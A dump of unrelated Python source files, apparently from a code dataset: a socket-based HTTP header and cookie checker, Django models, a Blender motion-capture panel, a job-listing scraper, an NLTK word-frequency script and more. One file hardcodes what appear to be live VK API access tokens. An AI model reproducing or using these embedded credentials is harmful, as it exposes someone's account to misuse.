if s2.find('Set-Cookie') == 0: # Check if contain Set-Cookie
s3 = s2[12:]
index2 = s3.find('=')
key = s3[:index2] # Get Set-Cookie key
s3 = s3[index2 + 1:]
index3 = s3.find(';')
domain = '' # domain value
if index3 != -1:
index4 = s3.find('domain=') # Get domain
if index4 != -1:
domain = s3[index4 + 7:]
index5 = domain.find(';')
domain = s3[index4 + 7:index5]
if count == 0: # First time received this Set-Cookie
print('List of Cookies: ')
count = count + 1
print('* name: ' + key + ', domain name: ' + domain)
if index == -1: # String end, break
break
s = s[index + 1:] # Delete this row
def port443(ip_address, support_http2):
a = ''
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = ssl.wrap_socket(sock) # Wrap with SSL
sock.settimeout(1)
address = (ip_address, 443) # HTTPS
sock.connect(address)
count = sock.sendall(bytes('GET / HTTP/1.1\r\nHost: ' + sys.argv[1] + '\r\nConnection: keep-alive\r\n\r\n',
'utf8')) # GET request
if count == 0: # If failed to send
print('Failed to check HTTP')
buf = sock.recv(1024) # Receiving response
while len(buf):
a = a + bytes.decode(buf)
buf = sock.recv(1024)
except Exception as e:
sock.close()
count = 0
while True:
index = a.find('\n')
if index == -1:
s2 = a
else:
s2 = a[:index]
if len(s2) == 0 or s2[0] == '\r':
break
if s2.find('HTTP') == 0: # Checking HTTP version
if not support_http2:
print('The newest HTTP versions that the web server supports: ' + s2[:8])
s7 = s2[9:12]
if s7 == '505': # Check status code
print('Status code: ' + s7 + ' - HTTP version not supported')
if s7 == '404':
print('Status code: ' + s7 + ' - File not found')
if s7 == '301':
print('Status code: ' + s7 + ' - Moved permanently')
print('Redirecting to new location... (over port 80)\n')
port80(ip_address, support_http2) # port443 to new location
break
if s7 == '302':
print('Status code: ' + s7 + ' - Found')
print('Redirecting to new location... (over port 80)\n')
port80(ip_address, support_http2) # port443 to new location
break
if s7 == '200':
print('Status code: ' + s7 + ' - OK')
else:
print('Status code: ' + s7)
if s2.find('Set-Cookie') == 0: # Check if contain Set-Cookie
s3 = s2[12:]
index2 = s3.find('=')
key = s3[:index2] # Get Set-Cookie key
s3 = s3[index2 + 1:]
index3 = s3.find(';')
domain = '' # domain value
if index3 != -1:
index4 = s3.find('domain=') # Get domain
if index4 != -1:
domain = s3[index4 + 7:]
if count == 0: # First time received this Set-Cookie
print('List of Cookies: ')
count = count + 1
print('* name: ' + key + ', domain name: ' + domain)
if index == -1: # String end, break
break
a = a[index + 1:] # Delete this row
def establish_tcp_connection(host):
return socket.create_connection((host, 443))
def get_http2_ssl_context():
ctx = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
ctx.options |= (
ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
)
ctx.options |= ssl.OP_NO_COMPRESSION
ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
ctx.set_alpn_protocols(["h2", "http/1.1"])
try:
ctx.set_npn_protocols(["h2", "http/1.1"])
except NotImplementedError:
pass
return ctx
def negotiate_tls(tcp_conn, context, host):
tls_conn = context.wrap_socket(tcp_conn, server_hostname=host)
negotiated_protocol = tls_conn.selected_alpn_protocol()
if negotiated_protocol is None:
negotiated_protocol = tls_conn.selected_npn_protocol()
if negotiated_protocol != "h2":
raise RuntimeError("Didn't negotiate HTTP/2!")
return tls_conn
if __name__ == '__main__':
main()
print('\n')
|
15,656 | 4487f0af7c4f6fadfc33a60566af54f392bc21a2 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from treebeard.mp_tree import MP_Node
from myproject.apps.core.models import CreationModificationDateBase
class Category(MP_Node, CreationModificationDateBase):
title = models.CharField(_("Title"), max_length=200)
class Meta:
verbose_name = _("Category")
verbose_name_plural = _("Categories")
def __str__(self):
return self.title
|
15,657 | 7b480ea8f4e5c7f69cfd06deb63fdd8ed9b78e2a | print('\n\tHello i am eng, module from extra')
|
15,658 | 5eee8fdadd02b3ae0d8bb9509472a071e0d62796 | from django.apps import AppConfig
class ServicesConfig(AppConfig):
name = 'services'
#nombre que saldrà y se verá publicamente en vez de 'services'
verbose_name = 'Gestor de servicios'
|
15,659 | 5fbb53b5a8a40d331b3300457d66006f068c0bc2 | items = ["dota", "LOL","csgo"]
if "LOL" in items:
items.remove("LOL")
print(items)
else:
print("There is no LOL") |
15,660 | 21a3465ff8f04bcb7e522342a559383e45531cff | from django.conf.urls.defaults import *
from django.conf import settings
from licorn.foundations import hlstr
urlpatterns = patterns('energy.views',
(r'^/?$', 'policies'),
(r'^policies/?$', 'policies'),
(r'^add_rule/(?P<who>.*)/(?P<hour>.*)/(?P<minute>.*)/(?P<day>.*)/?$', 'add_rule', {'new': False}),
(r'^del_rule/(?P<tid>.*)/?$', 'del_rule'),
(r'^get_recap/?$', 'get_recap'),
(r'^get_calendar_data/?$', 'get_calendar_data'),
(r'^generate_machine_html/(?P<mid>.*)/?$', 'generate_machine_html'),
(r'^get_machine_list/?$', 'get_machine_list'),
#(r'^get_machines_html/(?P<machines>.*)/?$', 'get_machines_html'),
)
|
15,661 | 03b13210ac1646d97fa1fdacafa40142a6648066 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,HttpResponse
from .models import Cars
# Create your views here.
def home_view(request,marka):
item_cars = Cars.objects.all()
A=0
for i in item_cars:
if (A > 1):
break
if(i.marka == "BMW"):
A=A+1
return HttpResponse('<h>%s comforline</h>' %i.marka)
if(i.marka =="Audi"):
return HttpResponse('<h>%s comfort</h>' % i.marka)
#return HttpResponse('<h>hosgeldin</h>') |
15,662 | 72b488bc92f9f38e2cacc25e92100581d22e7508 | import bpy
class OBJECT_PT_IMUPanel(bpy.types.Panel):
"""Creates a Panel in the Object properties window"""
bl_label = "IMU Suit"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_idname = "VIEW3D_PT_imu"
bl_category = 'Motion Capture'
def draw(self, context):
settings = context.scene.mc_settings
label = ("Stop Server (FPS: %.2f)" % settings.fps) if settings.start else "Start Server"
row = self.layout.row()
row.prop(settings, 'start', text=label, toggle=True, icon="PARTICLE_DATA")
label = ("Stop Recording - %.0f" % settings.frame_number) if settings.start_rec else "Start Recording"
row = self.layout.row()
row.prop(settings, 'start_rec', text=label, toggle=True, icon="OUTLINER_OB_CAMERA")
box = self.layout.box()
box.label(text="Pose Config:")
box.prop(settings, "obj")
row = box.row()
row.operator('wm.mocap_set_tpose_operator', icon="OUTLINER_OB_ARMATURE")
timer = row.operator('wm.mocap_set_tpose_operator', text="T-Pose Timer", icon="TIME")
timer.timer = 5
self.layout.separator()
box = self.layout.box()
row = box.row()
row.label(text="Selected Bone: " + bpy.context.active_pose_bone.name if bpy.context.active_pose_bone is not None else "" )
row.enabled = True if bpy.context.active_pose_bone is not None else False
row = box.row()
row.enabled = True if bpy.context.active_pose_bone is not None else False
bone = row.operator('wm.mocap_set_bone_operator', icon="POSE_HLT")
if context.scene.mc_settings.selected_id != '':
bone.sensor_str, bone.sensor_x, bone.sensor_y = context.scene.mc_settings.keyToSensors(context.scene.mc_settings.selected_id)
self.layout.separator()
box = self.layout.box()
box.label(text="IMU Node Config:")
if context.scene.mc_settings.selected_id != '':
row = box.row()
sensor = settings.mapping[settings.selected_id[2:]]['imu'][int(context.scene.mc_settings.selected_id[0:1])][int(context.scene.mc_settings.selected_id[1:2])]
if 'bone_name' in sensor:
row.label(text="Mapped Bone: " + sensor['bone_name'])
row = box.row()
row.prop(settings, "selected_id")
row = box.row()
row.prop(settings, "button_function")
row.separator()
box = self.layout.box()
box.label(text="IMU Physical Orientation:")
row = box.row()
row.prop(settings, "ui_forward")
row = box.row()
row.prop(settings, "ui_mirror")
self.layout.prop(settings, "flip_x")
self.layout.prop(settings, "swap_l_r")
self.layout.separator()
self.layout.separator()
self.layout.operator('wm.mocap_install_packages_operator', icon="IMPORT")
self.layout.prop(settings, 'port')
self.layout.prop(settings, "template")
register, unregister = bpy.utils.register_classes_factory([OBJECT_PT_IMUPanel])
if __name__ == "__main__":
register() |
15,663 | ceb9d2702d9c036e9f5058a668a805b8052a5c9e | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-11 16:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('landing', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ImportantNews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1000)),
('shorttext', models.CharField(max_length=2000)),
('fulltext', models.CharField(max_length=10000)),
],
),
migrations.CreateModel(
name='OrdinaryNews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1000)),
('shorttext', models.CharField(max_length=2000)),
('fulltext', models.CharField(max_length=10000)),
],
),
]
|
15,664 | 527779dd3190f387103b722c6dc858c8e9ac52fe | from django.db import models
from sis_gastronomico.empleados.models import Empleado
# Create your models here.
class Horario(models.Model):
horario = models.CharField(max_length=35)
desde = models.TimeField()
hasta = models.TimeField()
fecha_creacion = models.DateTimeField(auto_now=True)
fecha_modificacion = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ["desde"]
def __str__(self):
return "{:s} - De {:s} a {:s}".format(
self.horario.title(),
self.desde.strftime("%H:%M"),
self.hasta.strftime("%H:%M"),
)
class Turno(models.Model):
horario = models.ForeignKey(Horario, models.CASCADE)
fecha = models.DateField(auto_now=True)
empleados = models.ManyToManyField(Empleado)
fecha_creacion = models.DateTimeField(auto_now=True)
fecha_modificacion = models.DateTimeField(auto_now_add=True)
activo = models.BooleanField(default=True)
def __str__(self):
return "{:s} - {:s} ".format(str(self.fecha), str(self.horario))
|
15,665 | cdcd32e043e8ad3fc5dcd3285dbac3e306a39f1e | import os
import sys
def check_report_html():
if os.path.exists("report.html") is not True:
print("report.html file not exits")
return 0
try:
with open("report.html", "r") as f:
report_cont = f.read()
if report_cont.find("failed results-table-row") != -1:
print("chip or board support package test failed, please check it and repair!")
return 1
except Exception as err:
print("Error message : {0}.".format(err))
return 1
return 0
if __name__ == "__main__":
sys.exit(check_report_html())
|
15,666 | 7e1cd9309b1522d664072ea8d71c806f2dd6d583 | import pandas as pd
from convokit import Corpus, download
# This scripts downloads the following datasets using ConvKit (https://convokit.cornell.edu/)
# - Stanford Politeness Corpus (Wikipedia)
# - Stanford Politeness Corpus (Stack Exchange)
# This code is based on the following notebook:
# - https://github.com/CornellNLP/Cornell-Conversational-Analysis-Toolkit/blob/master/examples/conversations-gone-awry/Conversations_Gone_Awry_Prediction.ipynb
for dataset_name in ['stack-exchange-politeness-corpus', 'wikipedia-politeness-corpus']:
corpus = Corpus(filename=download(dataset_name))
kept_conversations = {c.id: c for c in corpus.iter_conversations()}
kept_utterances = {}
for convo_id in kept_conversations:
for utterance in kept_conversations[convo_id].iter_utterances():
kept_utterances[utterance.id] = utterance
corpus.conversations = kept_conversations
corpus.utterances = kept_utterances
print('{}: {} utterances'.format(dataset_name, len(corpus.utterances)))
texts = [ corpus.utterances[id].text for id in iter(corpus.utterances) ]
labels = [ corpus.utterances[id].meta['Binary'] for id in iter(corpus.utterances) ]
df = pd.DataFrame(data={
'text': texts,
'label': labels
})
df.to_csv('./{}.csv'.format(dataset_name), index=False)
|
15,667 | 632b0362fe2d240a99c46bba9d0e879b554d20b6 | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 24 17:22:39 2015
@author: xf05id1
"""
import pyxrf.model.fileio as fio
import string
import sys
import srxdatadir
#dfx3filedir = '/data/XSPRESS3/2015-3/in-house/'
#dfpyxrffoutdir='/nfs/xf05id1/data/pyxrf_analysis/unsorted/'
def x3toPyxrf(x3dir=srxdatadir.dfx3filedir, fileprefix=None, foutdir=srxdatadir.dfpyxrffoutdir, filenum=0):
print 'input file directory:', x3dir
if fileprefix == None:
print "please provide a fileprefix as indicated in Xspress3 screen. E.g. '2015_10_25_21_14'"
sys.exit()
if fileprefix[-1] == '_':
fileprefix=fileprefix[0:-1]
fin=x3dir+fileprefix+'_'+str(filenum)+'.hdf5'
print 'input file:', fileprefix+'_'+str(filenum)
print 'ouput file directory:', foutdir
dirf = string.split(fileprefix, sep='_')
textfiledir = '/nfs/xf05id1/data/'+ dirf[0] + '/' + dirf[1] + '/' + dirf[2] + '/'
textfilename = 'log_' + fileprefix + '_srx-2dscan-sdd-timeout.py.txt'
flog=textfiledir+textfilename
print 'ouput file name:', fileprefix+'_pyxrf.h5'
fout=foutdir+fileprefix+'_pyxrf.h5'
fio.xspress3_data_to_hdf(fin, flog, fout)
#for (fin, flog, fout) in zip(finList, flogList, foutList):
# print fin
# print flog
# print fout
|
15,668 | ad76e8f3e9856290b8840f485859819aa9348a8d | import matplotlib.pyplot as plt
import pickle
import sys
import os
DIRNAME = os.path.dirname(os.path.realpath(__file__))
OUT_DIR = os.path.join(DIRNAME, 'out')
MODEL = os.path.join(OUT_DIR, 'ann.hdf5')
HIST = os.path.join(OUT_DIR, 'ann.hist')
if not os.path.exists(MODEL):
print("missing model:", MODEL)
sys.exit(1)
if not os.path.exists(HIST):
print("missing history:", HIST)
sys.exit(1)
def plot(history):
# Summarize history for accuracy
plt.figure()
plt.plot(history['acc'])
plt.plot(history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
# Summarize history for loss
plt.figure()
plt.plot(history['loss'])
plt.plot(history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
if __name__ == '__main__':
history = pickle.load(open(HIST, "rb"))
print('val_loss:', min(history['val_loss']))
print('val_acc:', max(history['val_acc']))
try:
plot(history)
except KeyboardInterrupt as e:
sys.exit(0)
|
15,669 | fb089958b51b01aaa61852dd3eb767c806fde2e4 | import pandas as pd
import os
#import json
csv_file_path = os.getcwd() + r'\data\test_products.csv'
df = pd.read_csv (filepath_or_buffer=csv_file_path, sep=',', header=0)
df.head()
df_title = df[['title']].copy()
df_title.head()
json_file_path = os.getcwd() + r'\data\test_products.json'
#df_title.to_json (json_file_path, orient='records', indent=4)
json1 = df_title.to_json (orient='records')
test_products = '{"products": ' + json1 + '}'
#json_load = json.loads(test_products)
#json_dump = json.dumps(json1, indent=4)
#print(json_dump)
test_products_json_file = open(json_file_path, 'wt')
#test_products_json_file.write(json_dump)
test_products_json_file.write(format(test_products))
test_products_json_file.close()
|
15,670 | 10476e83a427770208a751de475a2dc35b7cedf6 | # Peter Dorsaneo
#
# Summer 2019 FIS(h) Tank Project, Team 3
# ========================================
# Python script to load a Chrome web page of the FIS Careers website and auto
# load the list of available intern positions.
#
# USAGE: python main.py
from constants import *
from splinter import Browser
from time import sleep
# browser = Browser('chrome')
browser = Browser('chrome', headless=True) # Doesn't display Chrome
# Visit URL.
browser.visit(JOB_SEARCH_URL)
# Find and click on the 'Intern' positions from the website.
option = browser.find_by_xpath('//select[@id="com.peopleclick.cp.formdata.JPM_DURATION"]//option[@value="7"]')
option.click()
# Javascript injection to unselect the option for 'all' positions.
# Without this, the webpage will still load all the open positions from the site.
browser.execute_script('document.getElementsByTagName("select")[3].getElementsByTagName("option")[0].selected = false')
# Select the most results per page that we can display. This is to be a quick
# and easy method for getting the whole list of internships currently available.
browser.execute_script('document.getElementById("com.peopleclick.cp.formdata.hitsPerPage").getElementsByTagName("option")[0].selected = false')
browser.execute_script('document.getElementById("com.peopleclick.cp.formdata.hitsPerPage").getElementsByTagName("option")[3].selected = true')
# Find and click the 'Search' button from the website.
button = browser.find_by_id('sp-searchButton')
button.click()
# Pause for bit to let things load due to potentially bad connections.
sleep(2)
# Extract the job positions as titles from the website.
positions = browser.find_by_css('div[class=" pf-sr-titleInnerWrapper"] > a')
# Extract the locations of the each of the jobs.
locations = browser.find_by_css('div[class="clearfix col-xs-12 col-sm-7 col-md-8 pf-padding-left pf-rwd-titlefieldsbox"] > div > span[id="com.peopleclick.cp.fieldlabel.index_0.JPM_LOCATION_value"]')
# Extract the brief descriptions from the job posting, this does not work currently.
# descriptions = browser.find_by_css('div[class="col-xs-12 visible-xs pf-paddingzero pf-rwd-jobPostDecription pf-rwd-wordwrap"] > span[id="com.peopleclick.cp.fieldlabel.index_0.JPM_DESCRIPTION_value"] > span[class="ng-binding"]')
# We will store the relevant job data into a list of dictionaries for our data
# structure.
job_list = []
# Add the jobs position and location as a dictionary to our job_list.
for position, location in zip(positions, locations):
job_list.append({POSITION : position.value, LOCATION : location.value, LINK : position['href']})
file = open('internships.txt', 'w')
# write the position and locations from our job listings into a text file.
for jobs in job_list:
# we know we only have two keys (so far) so use those.
file.write('{}\n'.format(jobs[POSITION]))
file.write('{}\n'.format(jobs[LOCATION]))
file.write('{}\n'.format(jobs[LINK]))
# Cleanup :)
file.close()
|
15,671 | 542a6f74b91a9a8967a90859e957e888509dedf0 | class BankAccount:
ROI = 10.5;
def __init__(self):
self.Name = input("Enter The Name: ");
self.Amount = float(input("Enter The Amount: "));
def Deposit(self):
self.Amount = self.Amount + int(input("Enter The amount To be Deposit: "));
def Withdraw(self):
self.Amount = self.Amount - int(input("Enter The amount To be Withdrawn: "));
def CalculateIntrest(self):
self.Amount = self.Amount + (self.Amount * self.ROI * 1) / 100;
def Display(self):
print ("Account Holder Name : ", self.Name, " and Total Saving: ", self.Amount);
def main():
obj1 = BankAccount();
obj1.Display();
obj1.Deposit();
obj1.Display();
obj1.Withdraw();
obj1.Display();
print("Before Calculating Interest: ");
obj1.Display();
obj1.CalculateIntrest();
print("After Calculating Interest: ");
obj1.Display();
if __name__ == "__main__":
main();
|
15,672 | 10344e02035c3e8d968d74e91b085c4a93ff5abd | import numpy as np
from numpy import ndarray
def mae(y_preds: ndarray, y_actual: ndarray) -> float:
"""
Mean Absoulte Error
"""
return np.mean(np.abs(y_preds - y_actual))
def rmse(y_preds: ndarray, y_actual: ndarray) -> float:
"""
Root Mean Squared Error
"""
return np.sqrt(np.mean(np.power(y_preds - y_actual, 2))) |
15,673 | e5503254321c4cc0f34cb08c4985842bbf89a55e | ##############################################
# Тут лежат API-ключи для работы с VkApi
##############################################
api_key = "71ce346062676bfa2d39d3bb17635a22fc556a0f3c07b78175c2f92c01c081f7c1674f31e0566ec52749d"
api_keyy = "31653914f8764433acff756be9b664e4711fa624e1cf739f85b549dbe25908ceb73b7e39a9d33f29f5dad"
peer_id = 113742536
|
15,674 | abb679e3fd79dbe4358568d73d41876470ab1713 | arr=[1100,1100,1110,10,1,234,2,5,1,66,100000,23,11,6,112,100,120,112,1300,1109,110,1100,-9,114,119]
#arr=[11,1,234,2,5,1,55]
arr1=[]
j=0
for i in arr:
if len(arr1)==0:
arr1.append(i)
continue
for j in range(len(arr1)):
if i<=arr1[j]:
arr1.insert(j,i)
break
elif j==len(arr1)-1:
arr1.append(i)
break
print arr1
|
15,675 | 7083c3f02290f710b69b0a21bf43029bc661844c | import requests
import proxies
from threading import Thread
URL= 'https://www.lagou.com/'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3112.113 Safari/537.36',
"Referer": "https://www.lagou.com/jobs/list_python"}
while True:
a = requests.get(url=URL, headers=headers, proxies=proxies.getproxies())
# a = requests.get(url=URL, headers=headers,)
print(a.content.decode()) |
15,676 | adc860a1fef633bba445ea2793e6a830f608d203 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'demoLimitsListWidget.ui'
#
# Created by: PyQt5 UI code generator 5.15.7
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(400, 300)
Dialog.setModal(True)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setGeometry(QtCore.QRect(30, 260, 341, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.limitsChoicesLabel = QtWidgets.QLabel(Dialog)
self.limitsChoicesLabel.setGeometry(QtCore.QRect(10, 30, 101, 16))
self.limitsChoicesLabel.setObjectName("limitsChoicesLabel")
self.limitsChosenLabel = QtWidgets.QLabel(Dialog)
self.limitsChosenLabel.setGeometry(QtCore.QRect(10, 230, 371, 20))
self.limitsChosenLabel.setText("")
self.limitsChosenLabel.setObjectName("limitsChosenLabel")
self.listWidgetLimits = QtWidgets.QListWidget(Dialog)
self.listWidgetLimits.setGeometry(QtCore.QRect(130, 30, 256, 192))
self.listWidgetLimits.setObjectName("listWidgetLimits")
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept) # type: ignore
self.buttonBox.rejected.connect(Dialog.reject) # type: ignore
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.limitsChoicesLabel.setText(_translate("Dialog", "Choose Limits:"))
|
15,677 | 44b1facd7fb6bf2fe21dbc4a4480a784a1d18375 | # Project 2 - Moonlander
#
# Name: James Plasko
# Instructor: Brian Jones
# Section: 21
import unittest
from lander_funcs import *
class TestCases(unittest.TestCase):
def test_update_acc1(self):
self.assertAlmostEqual(update_acceleration(1.62, 0), -1.62)
def test_update_acc2(self):
self.assertEqual(update_acceleration(1.62, 5), 0)
def test_update_acc3(self):
self.assertAlmostEqual(update_acceleration(1.62, 9), 1.296)
def test_update_altitude1(self):
self.assertAlmostEqual(update_altitude(130.6677, -1.62, -1.62), 128.2377)
def test_update_altitude2(self):
self.assertAlmostEqual(update_altitude(1300, -45.24, 1.296), 1255.408)
def test_update_altitude3(self):
self.assertAlmostEqual(update_altitude(123.42, 3.25, 2.45), 127.895)
def test_update_velocity1(self):
self.assertAlmostEqual(update_velocity(-23.543, 2.36), -21.183)
def test_update_velocity2(self):
self.assertAlmostEqual(update_velocity(2.49, -1.63), 0.86)
def test_update_fuel1(self):
self.assertEqual(update_fuel(500, 9), 491)
def test_update_fuel2(self):
self.assertEqual(update_fuel(4, 9), -5)
# Run the unit tests.
if __name__ == '__main__':
unittest.main()
|
15,678 | 8caf2e85ef6cbb9058b1db018609bc4b8cf2d784 | """Using word frequencies to create a summary.
"""
import argparse
import json
import string
import random
import pprint
from nltk import pos_tag
from nltk.collocations import BigramAssocMeasures
from nltk.collocations import BigramCollocationFinder
from nltk.corpus import wordnet
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.corpus import words as nltk_words
from nltk.stem import WordNetLemmatizer
from nltk.probability import FreqDist
import constants
###########################
# PART OF SPEECH TAG TRANSLATOR FROM `pos_tag` TAGS to `wordnet` TAGS
###########################
# source for tags: https://pythonprogramming.net/natural-language-toolkit-nltk-part-speech-tagging/
# NB: wordnet has a ADV_SAT tag, but I have no idea what that is
DEFAULT_TAG = wordnet.NOUN
POS_TRANSLATOR = {
'CC': DEFAULT_TAG, # coordinating conjunction
'CD': DEFAULT_TAG, # cardinal digit
'DT': DEFAULT_TAG, # determiner
'EX': DEFAULT_TAG, # existential there (like: "there is" ... think of it like "there exists")
'FW': DEFAULT_TAG, # foreign word
'IN': DEFAULT_TAG, # preposition/subordinating conjunction
'JJ': wordnet.ADJ, # adjective 'big'
'JJR': wordnet.ADJ, # adjective, comparative 'bigger'
'JJS': wordnet.ADJ, # adjective, superlative 'biggest'
'LS': DEFAULT_TAG, # list marker 1)
'MD': wordnet.VERB, # modal could, will
'NN': wordnet.NOUN, # noun, singular 'desk'
'NNS': wordnet.NOUN, # noun plural 'desks'
'NNP': wordnet.NOUN, # proper noun, singular 'Harrison'
'NNPS': wordnet.NOUN, # proper noun, plural 'Americans'
'PDT': wordnet.ADJ, # predeterminer 'all the kids'
'POS': DEFAULT_TAG, # possessive ending parent's
'PRP': DEFAULT_TAG, # personal pronoun I, he, she
'PRP$': DEFAULT_TAG, # possessive pronoun my, his, hers
'RB': wordnet.ADV, # adverb very, silently,
'RBR': wordnet.ADV, # adverb, comparative better
'RBS': wordnet.ADV, # adverb, superlative best
'RP': wordnet.ADV, # particle give up
'TO': DEFAULT_TAG, # to go 'to' the store.
'UH': DEFAULT_TAG, # interjection errrrrrrrm
'VB': wordnet.VERB, # verb, base form take
'VBD': wordnet.VERB, # verb, past tense took
'VBG': wordnet.VERB, # verb, gerund/present participle taking
'VBN': wordnet.VERB, # verb, past participle taken
'VBP': wordnet.VERB, # verb, sing. present, non-3d take
'VBZ': wordnet.VERB, # verb, 3rd person sing. present takes
'WDT': DEFAULT_TAG, # wh-determiner which
'WP': DEFAULT_TAG, # wh-pronoun who, what
'WP$': DEFAULT_TAG, # possessive wh-pronoun whose
'WRB': wordnet.ADV # wh-abverb where, when
}
def parse_arguments():
"""Parses command-line arguments.
Returns:
- args (argparse.Namespace): The parsed arguments
"""
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', type=str, help='The path to the JSON file containing processed text')
parser.add_argument('-w', '--num_words', type=int, help='The number of frequent words to print out', default=20)
parser.add_argument('-c', '--num_collocations', type=int, help='The number of collocations to print out',
default=10)
parser.add_argument('-cw', '--collocation_window', type=int, help='The window for searching for collocations',
default=5)
return parser.parse_args()
# End of parse_arguments()
def load_records(file, preview_records=False):
"""Loads the records from the JSON file. Also filters out empty records.
Params:
- file (str): The path to the JSON file
Returns:
- records (list<dict>): The contents of the JSON file
"""
with open(file, 'r') as json_file:
records = json_file.readlines()
records = [json.loads(record) for record in records]
records = list(filter(lambda record: record[constants.TEXT] != '', records))
if preview_records:
print("=====Random Sample of Records=====")
pprint.pprint(random.choices(records, k=10))
return records
# End of load_records()
def tokenize_records(records):
"""Tokenizes the records into word lists. Filters out any stopwords in the list.
Params:
- records (list<dict>): The non-empty records from the JSON file
Returns:
- tokenized_records (list<list<str>>): The tokenized text content of the records
"""
contents = map(lambda record: record[constants.TEXT], records)
tokenized_records = [word_tokenize(record.lower()) for record in contents]
lemmatized_records = lemmatize_words(tokenized_records)
lemmatized_words = list()
for lemmatized_record in lemmatized_records:
lemmatized_words.extend(lemmatized_record)
return lemmatized_words
# End of tokenize_records()
def lemmatize_words(records):
"""Lemmatizes the words in the tokenized sentences.
Lemmatization works best when the words are tagged with their corresponding part of speech, so the words are first
tagged using nltk's `pos_tag` function.
NB: There is a good chance that this tagging isn't 100% accurate. For that matter, lemmatization isn't always 100%
accurate.
Params:
- records (list<list<str>>): The word-tokenized records
Returns:
- lemmatized_records (list<str>)): The lemmatized words from all the records
"""
print('Length of tagged_records: {:d}'.format(len(records)))
print('Total number of words: {:d}'.format(sum([len(record) for record in records])))
tagged_records = map(lambda record: pos_tag(record), records)
tagged_records = filter_stopwords(tagged_records)
lemmatizer = WordNetLemmatizer()
lemmatized_records = list()
for record in tagged_records:
try:
lemmatized_record = list(map(lambda word: lemmatizer.lemmatize(word[0], POS_TRANSLATOR[word[1]]), record))
except Exception as err:
print(record)
raise err
lemmatized_records.append(lemmatized_record)
print('Total number of words after filtering: {:d}'.format(len(lemmatized_records)))
return lemmatized_records
# End of lemmatize_words()
def filter_stopwords(tagged_records):
"""Filters stopwords, punctuation, and contractions from the tagged records. This is done after tagging to make
sure that the tagging is as accurate as possible.
Params:
- tagged_records (list<list<tuple<str, str>>>): The records, with each word tagged with its part of speech
Returns:
- filtered_records (list<list<tuple<str, str>>>): The records, with unimportant words filtered out
"""
print('Filtering stopwords')
stop_words = list(stopwords.words('english'))
stop_words.extend(string.punctuation)
stop_words.extend(constants.CONTRACTIONS)
stop_words.extend(constants.MYSQL_STOPWORDS)
dictionary_words = set(nltk_words.words())
def not_dictionary_word(word):
return word[0] not in dictionary_words and word[1] not in ['NNP', 'NNPS']
filtered_records = [filter(lambda word: word[0] not in stop_words, record) for record in tagged_records]
filtered_records = [filter(lambda word: not_dictionary_word, record) for record in filtered_records]
filtered_records = [filter(lambda word: not word[0].replace('.', '', 1).isdigit(), record)
for record in filtered_records] # see https://stackoverflow.com/a/23639915/5760608
filtered_records = [list(filter(lambda word: word[1] in POS_TRANSLATOR.keys(), record))
for record in filtered_records]
return filtered_records
# End of filter_stopwords()
def extract_frequent_words(records, num_words, no_counts=False):
"""Stems the words in the given records, and then counts the words using NLTK FreqDist.
Stemming is done using the English Snowball stemmer as per the recommendation from
http://www.nltk.org/howto/stem.html
NB: There is also a Lancaster stemmer available, but it is apparently very aggressive and can lead to a loss of
potentially useful words (source: https://stackoverflow.com/a/11210358/5760608)
Params:
- records (list<str>): The tokenized records from the JSON file
- num_words (int): The number of words to extract
- no_counts (bool): If True, frequent words will not include the word counts
Returns:
- frequent_words (list<str> or list<tuple<str, int>>): The list of most frequent words
"""
word_counts = FreqDist(records)
frequent_words = word_counts.most_common(num_words)
if no_counts:
frequent_words = [word[0] for word in frequent_words]
print("=====The {:d} Most Frequent Words=====".format(num_words))
print(frequent_words)
return frequent_words
# End of extract_frequent_words()
def extract_collocations(records, num_collocations, collocation_window, compare_collocations = False):
"""Extracts the most common collocations present in the records.
Params:
- records (list<list<str>>): The tokenized and lemmatized records from the JSON file
- num_collocations (int): The number of collocations to show
- collocation_window (int): The text window within which to search for collocations
Returns:
- best_collocations (list<tuple<str>>): The highest scored collocations present in the records
"""
bigram_measures = BigramAssocMeasures()
bigram_finder = BigramCollocationFinder.from_words(records, window_size=collocation_window)
bigram_finder.apply_freq_filter(min_freq=3)
